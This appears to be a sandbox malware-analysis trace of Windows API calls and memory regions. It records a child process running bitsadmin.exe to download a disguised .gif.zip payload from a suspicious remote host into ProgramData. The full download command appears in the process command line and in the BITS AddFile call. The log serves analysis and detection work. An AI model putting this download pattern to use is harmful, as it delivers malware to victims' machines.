[0073.716] CoTaskMemFree (pv=0x390cb0)
[0073.725] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0073.725] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0073.725] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.726] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0073.726] CloseHandle (hObject=0x80) returned 1
[0073.726] exit (_Code=0)
Thread:
id = 169
os_tid = 0xd40
Thread:
id = 170
os_tid = 0xd44
Thread:
id = 171
os_tid = 0xd48
Thread:
id = 172
os_tid = 0xd4c
Process:
id = "17"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be620"
os_pid = "0xd74"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxb.gif.zip?93543106 C:\\ProgramData\\tempa\\marxvxinhhmxb.gif"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1767
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1768
start_va = 0x30000
end_va = 0x6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1769
start_va = 0x70000
end_va = 0x73fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 1770
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 1771
start_va = 0xa10000
end_va = 0xa53fff
entry_point = 0xa10000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1772
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1773
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1774
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1775
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 1776
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1777
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1778
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1779
start_va = 0xe0000
end_va = 0x1dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1780
start_va = 0x1e0000
end_va = 0x246fff
entry_point = 0x1e0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1781
start_va = 0x250000
end_va = 0x317fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 1782
start_va = 0x370000
end_va = 0x37ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 1783
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1784
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1785
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1786
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1787
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1788
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1789
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1790
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1791
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1792
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1793
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1794
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1795
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1796
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1797
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1798
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1799
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1800
start_va = 0x90000
end_va = 0x96fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000090000"
filename = ""
Region:
id = 1801
start_va = 0xa0000
end_va = 0xa1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000a0000"
filename = ""
Region:
id = 1802
start_va = 0xb0000
end_va = 0xb0fff
entry_point = 0xb0000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1803
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1804
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1805
start_va = 0x380000
end_va = 0x480fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000380000"
filename = ""
Region:
id = 1806
start_va = 0xa60000
end_va = 0x165ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a60000"
filename = ""
Region:
id = 1807
start_va = 0x490000
end_va = 0x4ebfff
entry_point = 0x490000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1808
start_va = 0x490000
end_va = 0x4ebfff
entry_point = 0x490000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1809
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1810
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1811
start_va = 0x490000
end_va = 0x63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1812
start_va = 0x490000
end_va = 0x56efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000490000"
filename = ""
Region:
id = 1813
start_va = 0x600000
end_va = 0x63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 1814
start_va = 0x320000
end_va = 0x320fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000320000"
filename = ""
Region:
id = 1815
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1816
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1817
start_va = 0x330000
end_va = 0x330fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 1818
start_va = 0x7c0000
end_va = 0x7fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 1819
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1820
start_va = 0x720000
end_va = 0x75ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000720000"
filename = ""
Region:
id = 1821
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1822
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1823
start_va = 0x570000
end_va = 0x5abfff
entry_point = 0x570000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1824
start_va = 0x570000
end_va = 0x5abfff
entry_point = 0x570000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1825
start_va = 0x570000
end_va = 0x5abfff
entry_point = 0x570000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1826
start_va = 0x570000
end_va = 0x5abfff
entry_point = 0x570000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1827
start_va = 0x570000
end_va = 0x5abfff
entry_point = 0x570000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1828
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1829
start_va = 0x1660000
end_va = 0x192efff
entry_point = 0x1660000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1830
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1831
start_va = 0x640000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 1832
start_va = 0x6a0000
end_va = 0x6dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006a0000"
filename = ""
Region:
id = 1833
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1834
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1835
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 174
os_tid = 0xd78
[0073.816] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6fd94 | out: lpSystemTimeAsFileTime=0x6fd94*(dwLowDateTime=0xdc9c4c10, dwHighDateTime=0x1d469c7))
[0073.816] GetCurrentProcessId () returned 0xd74
[0073.816] GetCurrentThreadId () returned 0xd78
[0073.816] GetTickCount () returned 0x205ca
[0073.816] QueryPerformanceCounter (in: lpPerformanceCount=0x6fd8c | out: lpPerformanceCount=0x6fd8c*=1814776200000) returned 1
[0073.817] GetModuleHandleA (lpModuleName=0x0) returned 0xa10000
[0073.817] __set_app_type (_Type=0x1)
[0073.817] __p__fmode () returned 0x757a31f4
[0073.817] __p__commode () returned 0x757a31fc
[0073.817] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa37f33) returned 0x0
[0073.817] __wgetmainargs (in: _Argc=0xa50824, _Argv=0xa5082c, _Env=0xa50828, _DoWildCard=0, _StartInfo=0xa50838 | out: _Argc=0xa50824, _Argv=0xa5082c, _Env=0xa50828) returned 0
[0073.818] _onexit (_Func=0xa3925e) returned 0xa3925e
[0073.818] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0073.818] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0073.818] AitLogFeatureUsageByApp () returned 0x0
[0073.819] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0073.819] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0073.819] VerifyVersionInfoW (in: lpVersionInformation=0x6fc08, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x6fc08) returned 1
[0073.819] SetLastError (dwErrCode=0x0)
[0073.819] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0073.819] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0073.819] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0073.819] GetCurrentProcess () returned 0xffffffff
[0073.819] GetCurrentThread () returned 0xfffffffe
[0073.819] GetCurrentProcess () returned 0xffffffff
[0073.819] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xa3c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xa3c3b0*=0x80) returned 1
[0073.819] SetConsoleCtrlHandler (HandlerRoutine=0xa274cb, Add=1) returned 1
[0073.819] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0073.819] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0073.819] SetThreadUILanguage (LangId=0x0) returned 0x409
[0073.820] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0073.821] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0073.821] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0073.822] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0073.822] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0073.822] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0073.822] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0073.822] swprintf_s (in: _Dst=0x6fd00, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0073.822] GetFileType (hFile=0x7) returned 0x2
[0073.822] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x6fc74 | out: lpMode=0x6fc74) returned 1
[0073.823] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6fca4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6fca4*=0x2) returned 1
[0073.823] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x6fcb0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6fcb0*=0x24) returned 1
[0073.823] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x6fcb4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6fcb4*=0x1e) returned 1
[0073.823] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x6fcb8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6fcb8*=0x29) returned 1
[0073.823] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6fcbc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6fcbc*=0x2) returned 1
[0073.823] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x6fcc0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6fcc0*=0x5e) returned 1
[0073.824] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x6fcc4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6fcc4*=0x58) returned 1
[0073.824] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6fcc8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6fcc8*=0x2) returned 1
[0073.824] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0073.835] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0073.835] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x6fd14 | out: lpNumberOfEvents=0x6fd14) returned 1
[0073.835] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0073.835] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xa3c3a8 | out: lpMode=0xa3c3a8) returned 1
[0073.835] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xa3c390 | out: lpConsoleScreenBufferInfo=0xa3c390) returned 1
[0073.835] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xa3c38c | out: lpMode=0xa3c38c) returned 1
[0073.836] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0073.836] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0073.836] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0073.836] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0073.836] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0073.836] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0073.836] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0073.836] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0073.836] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0073.836] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0073.836] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0073.836] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0073.836] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0073.837] CoCreateInstance (in: rclsid=0xa265d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0xa265b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xa3c3b4 | out: ppv=0xa3c3b4*=0xfa544) returned 0x0
[0073.874] IBackgroundCopyManager:CreateJob (in: This=0xfa544, DisplayName="msd5", Type=0x0, pJobId=0x6fcdc, ppJob=0x6fcd8 | out: pJobId=0x6fcdc*(Data1=0x188aeec, Data2=0x17e1, Data3=0x4e76, Data4=([0]=0xb5, [1]=0xd, [2]=0x45, [3]=0xca, [4]=0x42, [5]=0x2b, [6]=0x30, [7]=0x93)), ppJob=0x6fcd8*=0xfa61c) returned 0x0
[0073.880] CoTaskMemAlloc (cb=0x50) returned 0x110c70
[0073.880] IUnknown:AddRef (This=0xfa61c) returned 0x2
[0073.880] IUnknown:AddRef (This=0xfa61c) returned 0x3
[0073.880] PeekMessageW (in: lpMsg=0x6fc54, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x6fc54) returned 0
[0073.880] IUnknown:Release (This=0xfa61c) returned 0x2
[0073.880] IBackgroundCopyJob:SetPriority (This=0xfa61c, Val=0x0) returned 0x0
[0073.883] IBackgroundCopyJob:AddFile (This=0xfa61c, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxb.gif.zip?93543106", LocalName="C:\\ProgramData\\tempa\\marxvxinhhmxb.gif") returned 0x0
[0073.891] IBackgroundCopyJob:SetNotifyFlags (This=0xfa61c, Val=0xb) returned 0x0
[0073.894] IBackgroundCopyJob:SetNotifyInterface (This=0xfa61c, Val=0x110c70) returned 0x0
[0073.894] IUnknown:QueryInterface (in: This=0x110c70, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f758 | out: ppvObject=0x6f758*=0x0) returned 0x80004002
[0073.894] IUnknown:QueryInterface (in: This=0x110c70, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f718 | out: ppvObject=0x6f718*=0x0) returned 0x80004002
[0073.894] IUnknown:QueryInterface (in: This=0x110c70, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f700 | out: ppvObject=0x6f700*=0x0) returned 0x80004002
[0073.894] IUnknown:QueryInterface (in: This=0x110c70, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f6b4 | out: ppvObject=0x6f6b4*=0x110c70) returned 0x0
[0073.894] IUnknown:AddRef (This=0x110c70) returned 0x3
[0073.894] IUnknown:QueryInterface (in: This=0x110c70, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f614 | out: ppvObject=0x6f614*=0x0) returned 0x80004002
[0073.895] IUnknown:QueryInterface (in: This=0x110c70, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x110d84 | out: ppvObject=0x110d84*=0x0) returned 0x80004002
[0073.895] IUnknown:QueryInterface (in: This=0x110c70, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x6f61c | out: ppvObject=0x6f61c*=0x0) returned 0x80004002
[0073.895] IUnknown:Release (This=0x110c70) returned 0x2
[0073.897] IUnknown:QueryInterface (in: This=0x110c70, riid=0x101b98*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x6eb1c | out: ppvObject=0x6eb1c*=0x0) returned 0x80004002
[0073.897] IUnknown:QueryInterface (in: This=0x110c70, riid=0x101b98*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x6eb1c | out: ppvObject=0x6eb1c*=0x110c70) returned 0x0
[0073.898] IUnknown:QueryInterface (in: This=0x110c70, riid=0x101b98*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x1082f8 | out: ppvObject=0x1082f8*=0x110c70) returned 0x0
[0073.899] IBackgroundCopyJob:Resume (This=0xfa61c) returned 0x0
[0073.902] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0073.902] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0073.902] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x6fc38 | out: lpMode=0x6fc38) returned 1
[0073.908] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0073.908] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fc78*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
